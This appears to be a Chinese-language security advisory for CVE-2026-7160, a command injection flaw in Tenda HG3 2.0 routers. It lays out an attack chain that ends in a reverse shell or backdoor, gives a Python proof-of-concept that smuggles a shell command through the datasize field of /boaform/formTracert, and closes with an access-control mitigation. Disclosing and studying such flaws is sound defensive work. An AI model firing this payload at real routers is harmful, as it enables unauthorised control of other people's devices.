CVE-2026-7160 CVSS 8.8 高危

CVE-2026-7160 Tenda HG3命令注入漏洞

披露日期: 2026-04-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7160

漏洞类型

命令注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Tenda HG3

漏洞概述

Tenda HG3 2.0 路由器存在命令注入漏洞。攻击者通过向 /boaform/formTracert 接口发送恶意构造的 datasize 参数，可在服务器端执行任意系统命令，从而完全控制设备。

技术细节

该漏洞位于 Tenda HG3 2.0 的 /boaform/formTracert 接口。程序未对 datasize 参数进行严格过滤，直接将其拼接到系统命令中执行。攻击者发送特制 HTTP POST 请求，注入 Shell 元字符（如 ;），即可远程执行任意系统命令。此漏洞利用无需用户交互，仅需低权限，成功利用可完全控制设备，严重影响机密性、完整性和可用性。

攻击链分析

STEP 1

1. 侦察

攻击者扫描网络，识别开放了Web管理界面的Tenda HG3设备。

STEP 2

2. 构造攻击载荷

攻击者构造包含恶意Shell命令的HTTP POST请求，目标指向/boaform/formTracert，参数datasize中注入如'; ls -la'等命令。

STEP 3

3. 发送请求

将构造好的恶意请求发送至目标设备。

STEP 4

4. 命令执行

目标设备后端未过滤参数，直接解析并执行注入的系统命令。

STEP 5

5. 获取控制权

攻击者根据命令执行结果，进一步反弹Shell或植入后门，完全控制设备。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_ip):
    url = f"http://{target_ip}/boaform/formTracert"
    # Injecting a command to create a file as proof of execution
    # using ';' to separate commands in Linux shell
    payload = {
        "datasize": "64; touch /tmp/pwned.txt"
    }
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    
    try:
        response = requests.post(url, data=payload, headers=headers, timeout=5)
        if response.status_code == 200:
            print(f"[+] Payload sent to {target_ip}")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Failed to send payload, status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print("Usage: python poc.py <target_ip>")
    else:
        exploit(sys.argv[1])

影响范围

Tenda HG3 2.0

防御指南

临时缓解措施

若无法立即更新固件，请务必通过访问控制列表（ACL）限制路由器管理页面的访问源IP，仅允许受信任的内网设备进行管理，防止攻击者从外部网络利用该漏洞。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7160
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7160
3 Details https://www.cvedetails.com/cve/CVE-2026-7160/
4 VulDB https://vuldb.com/cve/CVE-2026-7160
5 Link https://vuldb.com/submit/802079
6 Link https://vuldb.com/vuln/359759
7 Link https://vuldb.com/vuln/359759/cti
8 Link https://www.notion.so/33e0c75766a880488924cf24523acf6c
9 Link https://www.tenda.com.cn/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表